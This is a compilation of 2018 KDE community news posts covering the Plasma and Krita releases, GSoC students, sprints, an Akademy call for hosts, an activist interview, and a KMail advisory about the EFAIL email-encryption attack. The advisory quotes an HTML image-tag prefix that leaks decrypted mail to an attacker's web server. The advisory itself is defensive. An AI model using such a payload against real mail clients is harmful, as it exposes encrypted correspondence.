Thursday, 17 May 2018. Today KDE unveils a beta release of Plasma 5.13.0.
Members of the Plasma team have been working hard to continue making Plasma a lightweight and responsive desktop which loads and runs quickly, but remains full-featured with a polished look and feel. We have spent the last four months optimising startup and minimising memory usage, yielding faster time-to-desktop, better runtime performance and less memory consumption. Basic features like panel popups were optimised to make sure they run smoothly even on the lowest-end hardware. Our design teams have not rested either, producing beautiful new integrated lock and login screen graphics.
KDE Student Programs is happy to present our 2018 Google Summer of Code students to the KDE Community.
Welcome Abhijeet Sharma, Aman Kumar Gupta, Amit Sagtani, Andrey Cygankov, Andrey Kamakin, Anmol Gautam, Caio Jordão de Lima Carvalho, Chinmoy Ranjan Pradhan, Csaba Kertesz, Demetrio Carrara, Dileep Sankhla, Ferencz Kovács, Furkan Tokac, Gun Park, Iván Yossi Santa María González, Kavinda Pitiduwa Gamage, Mahesh S Nair, Tarek Talaat, Thanh Trung Dinh, Yihang Zhou, and Yingjie Liu!
This year digiKam, KDE's professional photo management application, has three students: Tarek Talaat will be working on supporting Twitter and One Drive services in digiKam export, Thanh Trung Dinh on Web Services tools authentication with OAuth2, and Yingjie Liu on adding the possibility to manually sort the digiKam icon view.
Plasma, KDE's graphical desktop environment, will also be mentoring three students. Abhijeet Sharma will be working on fwupd integration with Discover (KDE's graphical software manager), Furkan Tokac will improve handling for touchpads and mice with Libinput, and Gun Park will port keyboard input modules to Qt Quick and expand scope to cover input method configuration for System Settings.
Another project with three students is Krita, KDE's popular graphic editor and painting application. Andrey Kamakin will improve multithreading in Krita's Tile Manager; Iván Yossi Santa María González (ivanyossi) will optimize Krita Soft, Gaussian and Stamp brushes mask generation to use AVX with Vc Library; and Yihang Zhou (Michael Zhou) is creating a Swatches Docker for Krita.
GCompris, the suite of educational programs and games for young learners, takes two students: Aman Kumar Gupta will port all GTK+ piano activities and get it one step closer to version 1.0, and Amit Sagtani will work on creating bitmap drawing and animation activities while preparing Gcompris for version 1.0.
Labplot, KDE's application for scientific data plotting and analysis, also mentors two students. Andrey Cygankov will add support for import data from web-service in LabPlot, and Ferencz Kovács will be working on plotting of live MQTT data.
Okular, KDE's PDF and document viewer, gets another two students: Chinmoy Ranjan Pradhan will be working on verifying signatures of PDF files, while Dileep Sankhla will implement the FreeText annotation with FreeTextTypeWriter behavior.
Csaba Kertesz (kecsap) will aim to improve the desktop and the Android version of KStars, KDE's planetarium program, while Kavinda Pitiduwa Gamage will work on KGpg, KDE's graphical key management application, to make it better.
Mahesh S. Nair will expand Peruse Creator, adding more features to KDE's easy-to-use comic book reader. Finally, Demetrio Carrara will be working on the WikitoLearn production-ready Progressive Webapp (PWA).
Traditionally, Google Summer of Code starts with an introduction period where students get to know their mentors, after which they start coding. The coding period for 2018 has began on May 14, and will last until August 6. We wish all our students a productive, successful, and fun summer!
On Monday, a security vulnerability in the OpenPGP and S/MIME email encryption standards and the email clients using those, called EFAIL was published.
What is this about and how is KMail affected? (Spoiler: KMail users are safe by default.)
The discovered vulnerability affects the OpenPGP and S/MIME standards used for end-to-end encryption of emails that specifically encrypts emails for the intended receivers. This is not to be confused with transport encryption (typically TLS) that is used universally when communicating with an email server. Users not using OpenPGP and S/MIME are not affected by this vulnerability.
End-to-end encryption is usually employed to prevent anyone different from the intended receiver from accessing message content, even if they somehow manage to intercept or accidentally receive an email. The EFAIL attack does not attempt
to break that encryption itself. Instead, it applies some clever techniques to trick the intended receiver into decrypting the message, and then sending the clear text content back to the attacker.
KMail relies on GnuPG for the OpenPGP and S/MIME handling, so you might also be interested in the GnuPG team's statement on EFAIL.
The EFAIL research paper proposes several exfiltration channels for returning the clear text content. The easiest one to understand is by exploiting the HTML capabilities of email clients. If not properly controlled, HTML email messages can download external resources, such as images, while displaying an email - a feature often used in corporate environments.
Considerably simplified, the idea is to add additional encrypted content around an intercepted encrypted message. The whole procedure for doing this is quite elaborate and explained in depth in the paper. Let's assume an attacker manages to prefix an intercepted encrypted email with the (encrypted) string "<img src='http://my.site/?" and append an extra "'/>". The result would look something like this, after decryption by the receiver:
An email client that unconditionally retrieves content from the Internet while displaying HTML emails would now leak the email content as part of an HTTP GET request to an attacker controlled web server - game over.
The OpenPGP standard has a built-in detection mechanism for manipulations of the encrypted content. This provides effective protection against this attack. KMail, or rather the GnuPG stack KMail uses for email cryptography, does make use of this correctly. Not all email clients tested by the EFAIL authors seem to do this correctly, though. Notwithstanding, your OpenPGP encrypted emails are safe from this attack if you use KMail.
The situation with S/MIME is more difficult, as S/MIME itself does not have any integrity protection for the encrypted content, leaving email clients with no way to detect the EFAIL attack. That's a conceptual weakness of S/MIME that can only really be fixed by moving to an improved standard.
Fortunately, this does not mean that your S/MIME encrypted emails cannot be protected in KMail. By default, KMail does not retrieve external content for HTML emails. It only does that if you either explicitly trigger this for an individual email by clicking the red warning box at the top of emails which informs of external content, or if you enable this unconditionally via Settings > Configure KMail > Security > Reading > Allow messages to load external references from the Internet. Starting with version 18.04.01, the latter setting will be ignored for S/MIME encrypted content as an additional precaution. For older versions, we recommend you make sure this setting is disabled.
Furthermore, distribution maintainers can get patches to solve this problem from here:
In order to revoke compromised signing keys, S/MIME relies on certificate revocation lists (CRLs) or the online certificate status protocol (OCSP). These two mechanisms consult an online server defined by the authority managing the
respective keys. The EFAIL paper suggests that this might be another possible exfiltration channel, as well as HTML. However, this hasn't been demonstrated yet, and the GnuPG team thinks it is unlikely to work. It is also a relevant piece
of the S/MIME security model, so simply disabling this as a precaution has security implications, too.
Therefore, we have not changed the default settings for this in KMail at this point. The reason is because compromised and thus revoked keys seem to be the more common concern than an elaborate targeted attack that would employ CRL or OCSP as an exfiltration channel (if possible at all). You'll find the corresponding settings for the CRL and OCSP usage under Settings > Configure KMail > Security > S/MIME Validation should you want to review or change them.
Research in email client and email cryptography security is very much appreciated and badly needed, considering how prevalent email is in our daily communication. As the results show, S/MIME is showing its age and is in need of conceptual improvements. Also, EFAIL again highlights the dangers to privacy caused by HTML emails with external references. Most importantly, this shows that your emails are well-protected by KMail and GnuPG, and there is certainly no reason to panic and stop using email encryption.
That said, it's not too early to start planning for Akademy 2019!
In fact, we are now opening the Akademy 2019 Call for Hosts, and looking for a vibrant spot and an enthusiastic crew that will host us.
Would you like to bring Akademy, the biggest KDE event, to your country? Read on to find out how to apply!
A Bit About Akademy
Akademy is KDE's annual get-together where our creativity, productivity and community-bonding reach their peak. Developers, users, translators, students, artists, writers - pretty much anyone who has been involved with KDE - will join Akademy to participate and learn. Contents will range from keynote speeches and two days of dual track talks by the FOSS community, to workshops and Birds of a Feather (BoF) sessions where we plot the future of the project.
The first day serves as a welcoming event. The next two days cover the keynote speakers and other talks. The remaining days are used for BoF sessions, intensive coding and workshops for smaller groups of 10 to 30 people. One of the workshop days is reserved for a day trip, so the attendees can see the local tourist attractions.
What You Get as a Host
Hosting Akademy is a great way to contribute to a movement of global collaboration. You get a chance to host one of the world's largest FOSS communities with contributors from across the globe, and witness a wonderful week of intercultural collaboration in your home town.
You'll get significant exposure to the Free Software community, and develop an understanding of how large projects operate. It is a great opportunity for the local university students, professors, technology enthusiasts and professionals to try their hand at something new.
What We Need from a Host
Akademy requires a location close to an international airport, with an appropriate conference venue that is easy to reach. Organizing Akademy is a demanding task, but you’ll be guided along the entire process by people who’ve been doing it for years. Nevertheless, the local team should be prepared to invest a considerable amount of time into organizing Akademy.
During the sprint, the Plasma team was joined by guests from Qt and Sway WM. Discussion topics included sharing Wayland protocols, input methods, Plasma Browser Integration, tablet mode for Plasma's shell, porting KControl modules to QtQuick, and last but not least, the best beer in Berlin.
Constructive Discussions with SwayWM - Check!
The effort to port Plasma to work on Wayland rather than X continues at a fast pace. Wayland protocols define how applications interact with the display, including tasks essential to Plasma such as declaring which "window" is really a panel. These protocols have to be defined by the Plasma team and preferably standardized with other users of the Linux desktop.
One newcomer to the field is SwayWM - a Wayland version of the i3 window manager. Drew DeVault, the lead developer of the project, joined our Plasma sprint to discuss where Wayland procotols could be shared. The team looked at their Layer Protocol, which covers much of the work of the current plasmashell protocol. We found that this protocol contains some nice ideas and suggested some improvements for the SwayWM developers.
The Plasma Output Management Protocol was also discussed. This protocol defines how external monitors are used, and Sway currently just reloads configuration files as needed. The team will consider this solution if the need for such a protocol arises. Protocols for Remote Access were compared and reviewed along with Pipewire as systems for managing audio and video. Drew wrote a blog post with more information on this topic.
Exciting Collaboration with Qt - Check!
Shawn Rutledge, the lead developer of Qt's new input stack, also joined us for a few days of the sprint. Together, we reviewed the new API and looked at how some of the unique use-cases of Plasma would work with it. The conclusion was that "some parts, including complex drag-and-drop actions, went surprisingly smoothly".
A bunch of design changes were suggested and improvements submitted. Working with Qt developers at this early stage is a great win for both projects, as it saves KDE developers a lot of time when they come to use the new features, while the Qt world gets a nicer result.
Improved Plasma Browser Integration - Check!
Plasma Browser Integration is a fun new feature that will be shipped with Plasma 5.13 next month.
It means Firefox and Chrome/Chromium will use Plasma's file transfer widget for downloads and native Plasma notifications for browser notifications. Moreover, media controls will work with the task manager.
The browser extensions were tidied up, translations fixed, and accounts on the relevant browser store websites set up. Another decision made at the sprint was that we have a collective duty to make sure KDE's new web browser Falkon is at feature-parity in terms of Plasma integration.
Plasma on Pinebook and Tablet Mode - Check!
The team continued to work on convergence with other form factors - in other words, on making Plasma run seamlessly on a variety of devices, both desktop and mobile. Bhushan worked on Plasma Mobile images for devices which supports upstream kernel, which is essential for security and more up-to-date system on mobile devices.
Rohan worked on making Plasma run smoothly and with all Free drivers on the low-end Pinebook laptop. This goes to show that Plasma can function as a lightweight desktop environment without losing the features.
Lastly, Marco managed to get Plasma working on a convertible laptop with support for switching into tablet mode, illustrating how we can actively shift between form factors.
Talks, Burritos, and Beer - Check!
Throughout the week, we also gave talks to our host company Endocode who kindly lent us their central Berlin offices, complete with a fridge full of alcohol-free beer.
Kdenlive is KDE's advanced video-editor. This April, members of the Kdenlive project met up for five days - from 25th to the 29th - for their spring sprint. The developers Jean-Baptiste Mardelle and Nicolas Carion, along with professional community videomakers Farid Abdelnour, Rémi Duquenne and Massimo Stella, got together at the Carrefour Numérique in Paris to push the project forward.
This is what happened...
Despite a very busy agenda, which included pitching Kdenlive to the general public, the attendees managed to work some new features into the code. For example, the next version of Kdenlive that hits your distro will include a feature that will automatically split video and audio tracks by default into separate tracks. This saves time, since the workflows for editing video and audio are substantially different, and editors often have to separate tracks to work on them individually anyway.
The toolbar that overlays monitors got a makeover and now supports multiple layout guides. The toolbar is translucent, so you can still see what is going on in the clip, and only appears when you move the mouse to the upper right corner of the monitor. This not only looks cool (very important!), but also makes it practical, since it is invisible most of the time, not blocking your view of the clip.
Apart from coding in new features, the team held two public sessions. First they talked with potential contributors. This had an immediate effect, as Camille took it on himself to update the project's wiki, and Elie submitted a patch which added the possibility to manage and download keyboard shortcut templates of other video editors such as Avid, Final Cut and Adobe Premiere Pro. This means an editor used to working with closed-source alternatives will immediately feel at home with Kdenlive.
The second public event was with video-editing enthusiasts. The audience had the opportunity to see Kdenlive in action and find out more about the software, as well as talk with the developers.
Coming to a Theatre Near You
Apart from the incremental improvements that have already made their way into the beta versions of Kdenlive's next release, more exciting features are on the way. During the the sprint, the developers agreed on a roadmap of where they want to take Kdenlive next, and made a priority of incorporating Advanced Trimming and Single Track Transitions in the upcoming releases.
Advanced trimming allows you to roll, ripple, slip or slide a clip between two existing ones. This lets you drop a clip onto a track and have the surrounding clips behave in different ways, cropping or displacing frames automatically according to what you want to do. With Single Track Transitions, on the other hand, you can overlap one clip onto another on the same track and apply a transition between the two, instead of having to figure out transitions across several tracks.
More longer term goals include Multicam Editing. This comes in handy when you have filmed the same event from different angles with more than one camera. Kdenlive will help you sync up the action so you can cut from one to the other seamlessly. Another goal is to support faster renders, splitting the workload between the multiple cores most modern computers come with, as well as sending heavy workloads off to the GPU.
One final thing to look forward to is the integration of Kdenlive with other Free Software video- and audio-editing tools. The developers are looking at Blender, Natron and Ardour, as well as graphics-editing tools like GIMP, Krita and Inkscape. The plan is to incorporate their special and specific features into Kdenlive and make sure all these tools can work seamlessly together. This would mean, for example, that you could create a 3D text effect in Blender and bridge it into Kdenlive without having to go through time-consuming exports and imports. Or you could edit a sequence in Kdenlive and frameserve it to do the compositing in Natron.
As with many Free Software projects, the Kdenlive team can always use more contributors. New developers can help get features incorporated sooner and bugs squashed more efficiently. Documenters and translators can help make the guides, manuals and websites more accessible to a larger audience. Join the mailing list, Telegram group, or drop by the #kdenlive channel on Freenode to find out how you, too, can help.
Kdenlive is already a very capable video-editor, but the work the team is carrying out promises to make it a world-class tool that both aficionados and professionals can use. The latest version of Kdenlive is available in many distributions, as well as in AppImage and Flatpak formats. Vincent Pinon is also working on the Windows port which is currently in a Beta stage.
The rest of the week will be taken up by BoF sessions, workshops and sprints, in which KDE community members will be working elbow-to-elbow and learning from each other, intent on building a better KDE for everybody.
For most of the year, KDE—one of the largest free and open software communities in the world—works on-line by email, IRC, forums and mailing lists. Akademy provides all KDE contributors the opportunity to meet in person to foster social bonds, work on concrete technology issues, consider new ideas, and reinforce the innovative, dynamic culture of KDE. Akademy brings together artists, designers, developers, translators, users, writers, sponsors and many other types of KDE contributors to celebrate the achievements of the past year and help determine the direction for the next year. Hands-on sessions offer the opportunity for intense work bringing those plans to reality. The KDE Community welcomes companies building on KDE technology, and those that are looking for opportunities. For more information, please contact The Akademy Team.
The sprint will run from the 25th to the 29th of April, and two days will be open to the public. On Friday, 27th of April, from 4pm to 6pm the event will be open to anyone interested in getting involved. You can meet the team and learn how you can contribute to the project. On Saturday, 28th of April at 2.45pm, there will be a public presentation. You can discover Kdenlive as used by professional editors and learn about the new features.
Just in case you can't make it to Paris, but can get to the south of Spain: directly after the sprint, the team will fly to Seville to participate in the Libre Graphics Meeting.
That Krita has become one of the most popular applications for painting among digital artists is an understatement. The great thing is that, with every new version, Krita just gets better and better. The latest release is a perfect example of that. Check out what you can look forward to in the new 4.0 version:
1. SVG for Vector Tools
Krita 4.0 will use SVG on vector layers by default, instead of the prior reliance on ODG. SVG is the most widely used open format for vector graphics out there. Used by "pure" vector design applications, SVG on Krita currently supports gradients and transparencies, with more effects coming soon.
Krita 4.0 also includes an improved set of tools for editing objects created on vector layers, letting you tweak the fill, the shape, and other features of your vector elements.
2. New Text Tool
The usability of the text tool has been vastly improved. The tool has been re-written to be more reliable, and has a better base for future expansion. As it also follows the SVG standard (instead of the prior ODT), it is compatible with more design applications.
3. Python Scripting
Krita now comes with a brand new Python scripting engine. This engine lets you write snippets of code that create and manipulate images, add dockers, entries to the menu, and much more. To get you started, the creators have included a large amount of example scripts. In Krita's Settings dialog, you can enable or disable Python plugins. Check out the manual and learn how to pythonize your Krita.
Note that this is the first release to include scripting, so it is very much a work in progress at this stage. Be advised that some things will work, but, for those that don't... Please tell the team!
4. New Brushes
If there is one thing Krita is famous for, that is its wide variety of brushes. Krita 4.0 has a special surprise in that department: David Revoy, the creator of Pepper and Carrot, has added his own personal set of brushes to this version.
5. Colorize Mask Tool
The new Colorize Mask Tool allows you to quickly and easily fill areas of line-art images with color. How it works: you create the mask for your line-art image, and then paint a streak of color into each area. The feature will automatically and intelligently fill each region with the colors you painted in, saving you the trouble of having to paint everything by hand or using the "dumb" fill tool.
Masked brushes are created by combining two brushes with each other in different ways. Say you have a brush in the shape of a heart, and then a soft sponge brush. If you combine them using the multiply operation, you will get a mix of both - a completely new brush!
As for performance improvements, Krita now multi-threads the pixel brush engine. This means Krita is now smart enough to let each of your computer's cores calculate the dabs separately, and also have them work together. Use the performance settings to let Krita know how many cores it should use. These changes only affect the pixel brush engine for now, but the feature will later be expanded to other engines like the color smudge.
Also, all brushes now have an Instant Preview threshold property. This speeds up a lot of smaller brushes that didn't have any performance improvement features in prior versions. Instant Preview will automatically turn on when the size of a brush changes by a certain amount.
Both things combined make painting with Krita a more fluid and pleasurable experience.
Okay, so that was 7 things. But the fact is that Krita has long since transcended its humble origins as a clone of other design applications, and has become the tool of choice for digital painters regardless of the platform they use.
Dan Bielefeld is an activist that works for a South Korean NGO. Dan worked in the Washington, D.C. area training young activists in the areas of politics and journalism before going into researching atrocities committed by the North Korean regime. He is currently the Technical Director of the Transitional Justice Working Group and helps pinpoint the locations of mass burial and execution sites using mapping technologies.
Dan will be delivering the opening keynote at this year's Akademy and he kindly agreed to talk to us about activism, Free Software, and the sobering things he deals with every day.
Paul Brown: Hello Dan and thanks for agreeing to sit down with us for this interview.
Dan: Yes, we have a mapping project that tries to identify specific coordinates of sites with evidence related to human rights violations.
Paul: And you were a web designer before joining the organization... I've got to ask: How does one make the transition from web designer to human rights activist?
Dan: I was a web developer for several years before moving to Korea. When I moved here, I enrolled as a Korean language student and also spent most of my free time volunteering with North Korean human rights groups. So, unfortunately, that meant putting the tech stuff on hold for a while (except when groups wanted help with their websites).
Paul: You are originally from the US, right?
Dan: Yes, from Wisconsin.
Paul: Was this a thing that preoccupied you before coming to Korea?
Dan: I initially came on a vacation with no idea that I'd one day live and work here. In the lead-up to that trip, and especially after that trip, I sought out more information about Korea, which inevitably brought me repeatedly to the subject of North Korea.
Most of the news about North Korea doesn't grab my attention (talking about whether to resume talking, for instance), but the situation of regular citizens really jumped out at me. For instance, it must've been in 2005 or so that I read the book The Aquariums of Pyongyang by a man who had literally grown up in a prison camp because of something his grandfather supposedly did. This just didn't seem fair to me. I had thought the gulags where only a thing of history, but I learned they still exist today.
Paul: Wait... So people can inherit "crimes" in North Korea?
Dan: They call it the "guilt-by-association" system. If your relative is guilty of a political crime (e.g., defected to the South during the Korean War), up to three generations may be punished.
Paul: Wow. That is awful, but somehow I feel this is not the most awful thing I am going to hear today...
Dan: For a long time I thought it was just North Korea, but I have since learned that this logic / punishment method is older than the division of the North and South. For a long time after the division, in the South it was hard to hold a government position if your relative was suspected of having fled to the North, for instance.
Paul: What's your role in Transitional Justice Working Group?
Dan: I'm the technical director, so I'm responsible for our computer systems and networks, which includes our digital security. I also manage the mapping project, and I am also building our mapping system.
Paul: Digital security... I read that North Korea is becoming a powerhouse when it comes to electronic terrorism. How much credibility do these stories have? I mean, they seem to be technologically behind in nearly everything else.
Dan: This is a really interesting question and the answer is very important to my work, of course.
Going up against great powers like the US, the North Korean leadership practices asymmetrical warfare. Guerilla warfare, terrorism, these are things that can have a big impact with relatively little resources against a stronger power.
In digital security, offense tends to be easier than defense, so they naturally have gravitated online. Eike [Hein -- vice-president at KDE e.V.] and I went to a conference last year at which a journalist, Martyn Williams of NorthKoreaTech.org said they train thousands of hackers from an early age. The average person in North Korea doesn't have a lot of money and may not even have a computer, but those the regime identifies and trains will have used computers and received a great deal of training from an early age. They do this not only for cyber-warfare, but to earn money for the regime. For instance, the $81 million from the Bangladesh bank heist.
Paul: Ah, yes! They did Wannacry too.
Paul: Do your systems get attacked?
Dan: One of our staff members recently received a targeted phishing email that looked very much like a proper email from Google. The only thing not real was the actual URL it went to. Google sent her the warning about being targeted by state-sponsored attackers and recommended she join their Advanced Protection Program, which they launched last year for journalists, activists, political campaign teams, and other high-risk users.
We of course do our best to monitor our systems, but the reality today is that you almost have to assume they're already in if they're motivated to do so.
Paul: That is disturbing. So what do you do about that? What tools do you use to protect and monitor your systems?
Dan: What I've learned over the last three years is that the hardest part of digital security is the human element. You can have the best software or the best system, but if the password is 123456 or is reused everywhere, you aren't really very secure.
We try to make sure that, for instance, two-factor authentication is turned on for all online accounts that offer it -- for both work and personal accounts. You have to start with the low-hanging fruit, which is what the attackers do. No reason to burn a zero-day if the password is "password". Getting people to establish good digital hygiene habits is crucial. It's sort of like wearing a seatbelt -- using 2FA might take extra time every single time you do it, and 99.9% of the time, it's a waste of time, but you'll never really know in advance when you'll really need it, so it's best to just make it a habit and do it every time.
Another thing, of course, is defense in layers: don't assume your firewall stopped them, etc.
Paul: What about your infrastructure? Bringing things more to our terrain: Do you rely on Free Software or do you have a mix of Free and proprietary? Are there any tools in particular you find especially useful in your day-to-day?
Dan: I personally love FOSS and use it as much as I can. Also, being at a small NGO with a very limited budget, it's not just the freedom I appreciate, but the price often almost makes it a necessity.
Paul: But surely having access to the code makes it a bit more trustworthy than proprietary blackboxes. Or am I being too biased here?
Dan: Not all of my colleagues have the same approach, but most of them use, for instance, LibreOffice everyday. For mapping, we use Postgres (with PostGIS) and QGIS, which are wonderful. QGIS is a massive project that so far we've only scratched the surface of. We also use Google Earth, which provides us with imagery of North Korea for our interviews (I realize GE is proprietary).
I agree, though, that FOSS is more trustworthy -- not just for security, but privacy reasons. It doesn't phone home as much!
Paul: What about your email server, firewalls, monitoring software, and so on. What is that? FLOSS or proprietary?
Dan: Mostly FLOSS, but one exception, I must admit, is our email hosting. We do not have the resources to safely run our own email. A few years ago we selected a provider that was a partner with a FOSS project to run our own email service, but we ultimately switched to Google because that provider was slow to implement two-factor authentication.
Dan: The human right situation in North Korea is very disturbing and the sad thing is it's continued for 60+ years. The UN's Report of the Commission of Inquiry on human rights in the Democratic People’s Republic of Korea from 2014 is a must-read on the general human rights situation in North Korea. From the principal findings section (para. 24), "The commission finds that systematic, widespread and gross human rights violations have been and are being committed by the Democratic People’s Republic of Korea. In many instances, the violations found entailed crimes against humanity based on State policies."
Their mandate looked at "violations of the right to food, the full range of violations associated with prison camps, torture and inhuman treatment, arbitrary arrest and detention, discrimination; in particular, in the systemic denial and violation of basic human rights and fundamental freedoms, violations of the freedom of expression, violations of the right to life, ... enforced disappearances, including in the form of abductions of nationals of other States," and so on.
For our mapping project, we published our first report last year, based on interviews with 375 escapees from North Korea who have now settled in South Korea.
They collectively told us the coordinates of 333 killing sites, usually the sites of public executions, which local residents, including school children, are encouraged and sometimes forced to watch. It should be noted that this number hasn't been consolidated to eliminate duplicates. Some people reported more than one site, others none at all, but on average, almost one site per person was reported.
Paul: And how do you feel about the situation? I am guessing you have met North Korean refugees passing through your workplace and that you, like most of us, come from a very sheltered and even cushy Western society background. How do you feel when faced with such misery?
Dan: It's a good question and hard to put into words what I feel. I guess, more than anything, I find the North Korean regime so unfair. Those we met in Seoul have been through so much, but they also are the ones who overcame so many obstacles and now have landed on their feet somewhere. It's not easy for them, but usually the longer they're here, the better they end up doing.
Continuing about the mapping project's first report findings, from those 375 interviewees, we were also told the coordinates of 47 "body sites" - we use the term "body sites" because it's more general than burial sites. Most of the sites were burial sites, but some were cremation sites or places where bodies had been dumped without being buried, or stored temporarily before being buried. This 47 figure IS consolidated / de-duped (from 52), unlike the killing sites number.
Paul: You manually plot sites on maps, correct? You have to rely on witnesses remembering where they saw things happen...
Dan: We manually plot them using Google Earth, yes. During the interview, our interviewer (who himself is originally from the North) looks together with the interviewee at Google Earth's satellite imagery. You have to get used to looking down at the world, which takes some getting used to for some people.
Paul: Is there no technology that would help map these things? Some sort of... I don't know... thermal imaging from satellites?
Dan: Our goal eventually would be to interview all 30,000-plus North Koreans who've resettled in South Korea. The more we interview, and the more data points we get, the more we can cross-reference testimonies and hopefully get a better picture of what happened at these locations. I went to the big FOSS4G (G=Geospatial) conference last year in Boston and also the Korean FOSS4G in Seoul, and got to meet people developing mapping systems on drones. The only problem right now with drones is that flying them over North Korea will probably be seen as an act of war.
When we get enough data points, we could use machine learning to help identify more potential burial sites across all of North Korea. Something similar is being done in Mexico, for instance, where they predict burial sites of the victims of the drug wars.
Paul: You mentioned that the crimes have been going on for 60 years now. What should other countries be doing to help stop the atrocities? Because it seems to me that, whatever they have been doing, hasn't worked that well...
Dan: Very true, that. North Korea is very good at playing divide and conquer. The rivalry between the Soviets and the Chinese, for instance, allowed them to extract more aid or resources from them.
They also try to negotiate one-on-one, they don't want to sit down to negotiate with the US and South Korea at the same time, only with one or the other, for instance. North Korea - South Korea and North Korea - US meetings are dramatically being planned right now, and it puts a lot of stress on the alliance between the US and South Korea. That's definitely a goal of North Korea's leadership. Again, divide and conquer.
So one thing that's an absolute must is for South Korea to work very closely with other countries and for them to all hold to the same line. But there are domestic and external forces that are pulling all of the countries in other directions, of course.
I would say to any government to always keep human rights on the agenda. This does raise the bar for negotiations, but it also indicates what's important. It also sends an important message to the people of North Korea, whom we’re trying to help.
I also think strategies that increase the flow of information into, out of, and within North Korea are key. For instance, the BBC recently opened a Korea-language service for the whole peninsula including North Korea. And Google’s Project Loon and Facebook’s similar project with drones could theoretically bring the internet to millions.
Paul: Do you think these much-trumpeted US - North Korean negotiations will happen? And if so, anything productive will come from them?
Dan: I really don't know. Also, one can't talk about all this without mentioning that China is North Korea's enabler, so if you want to significantly change North Korea, you have to influence China.
To more directly answer the question, two US presidents (one from each party) made big deals with the North Koreans but the deals fell apart. We’ll see.
Paul: We've covered what governments can do, but what can private citizens do to help?
Dan: One major thing is to help amplify the voices of North Korean refugees and defectors. There are a few groups in Seoul, for instance, that connect English speakers with North Korean defectors who want to learn and practice their English. There are small North Korean defector communities in cities like London, Washington DC, etc. I don't know about Berlin, but I wouldn't be surprised!
That's at the individual-to-individual level, but also, those with expertise as software developers, could use their skills to empower North Korean refugee organizations and activists, as well as other North Korean human rights groups.
Paul: Empower how? Give me a specific thing they can do.
Dan: For instance, one time I invited an activist to the Korea KDE group. He and some KDE community leaders had a very interesting discussion about how to use Arduino or something similar to control a helium-filled balloon to better drop leaflets, USB sticks, etc. over North Korea.
Paul: That is a thing? What do the Arduinos do, control some sort of rotor?
Paul: What do you put on the sticks and cards? "The Interview"? "Team America"?
Dan: There are several groups doing this, which is good, since they all probably have different ideas of what North Koreans want to watch. I think South Korean TV shows, movies, and K-Pop are staples. I have heard Wikipedia also goes on to some sticks, as do interviews with North Koreans resettled in South Korea...
Paul: Dan, thank you so much for your time.
Dan: Thanks so much, Paul, I look forward to meeting you and the rest of the KDE gang this summer.
Paul: I too look forward to seeing you in Vienna.
Dan will be delivering the opening keynote at Akademy 2018 on the 11th of August. Come to Akademy and find out live how you too can fight injustice from the realms of Free Software.
For most of the year, KDE—one of the largest free and open software communities in the world—works on-line by email, IRC, forums and mailing lists. Akademy provides all KDE contributors the opportunity to meet in person to foster social bonds, work on concrete technology issues, consider new ideas, and reinforce the innovative, dynamic culture of KDE. Akademy brings together artists, designers, developers, translators, users, writers, sponsors and many other types of KDE contributors to celebrate the achievements of the past year and help determine the direction for the next year. Hands-on sessions offer the opportunity for intense work bringing those plans to reality. The KDE Community welcomes companies building on KDE technology, and those that are looking for opportunities.